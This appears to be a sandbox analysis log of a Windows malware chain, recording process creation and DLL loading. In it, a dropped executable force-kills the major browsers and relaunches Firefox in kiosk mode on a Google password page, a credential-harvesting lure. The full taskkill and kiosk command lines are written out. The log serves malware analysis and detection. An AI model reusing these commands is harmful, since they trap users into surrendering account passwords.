Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2208 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {423ea620-fe66-413c-8935-40f62b63c251} 5916 "\\.\pipe\gecko-crash-server-pipe.5916" 25e3236e310 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe "C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe"
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe "C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe "C:\Users\user\AppData\Local\Temp\1003039001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe "C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2916 -parentBuildID 20230927232528 -prefsHandle 4284 -prefMapHandle 4008 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f1378f9-151b-4458-be92-e8615185ef25} 5916 "\\.\pipe\gecko-crash-server-pipe.5916" 25e448f6d10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe "C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe"
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2164 -prefMapHandle 2148 -prefsLen 25250 -prefMapSize 239580 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d656b9f2-c939-41fa-9650-c12bc10d3aaf} 6612 "\\.\pipe\gecko-crash-server-pipe.6612" 20f2056dd10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe "C:\Users\user\AppData\Local\Temp\1003039001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 4880 -prefMapHandle 4876 -prefsLen 32262 -prefMapSize 239580 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bbb0be4-1696-4846-9575-46d8e9741b04} 6612 "\\.\pipe\gecko-crash-server-pipe.6612" 20f3b07f710 utility
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe "C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe "C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe"
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe "C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe "C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe "C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe "C:\Users\user\AppData\Local\Temp\1003039001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe "C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe"
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe "C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe"
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2208 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {423ea620-fe66-413c-8935-40f62b63c251} 5916 "\\.\pipe\gecko-crash-server-pipe.5916" 25e3236e310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2916 -parentBuildID 20230927232528 -prefsHandle 4284 -prefMapHandle 4008 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f1378f9-151b-4458-be92-e8615185ef25} 5916 "\\.\pipe\gecko-crash-server-pipe.5916" 25e448f6d10 rdd
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2164 -prefMapHandle 2148 -prefsLen 25250 -prefMapSize 239580 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d656b9f2-c939-41fa-9650-c12bc10d3aaf} 6612 "\\.\pipe\gecko-crash-server-pipe.6612" 20f2056dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 4880 -prefMapHandle 4876 -prefsLen 32262 -prefMapSize 239580 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bbb0be4-1696-4846-9575-46d8e9741b04} 6612 "\\.\pipe\gecko-crash-server-pipe.6612" 20f3b07f710 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: uxtheme.dll Jump to behavior
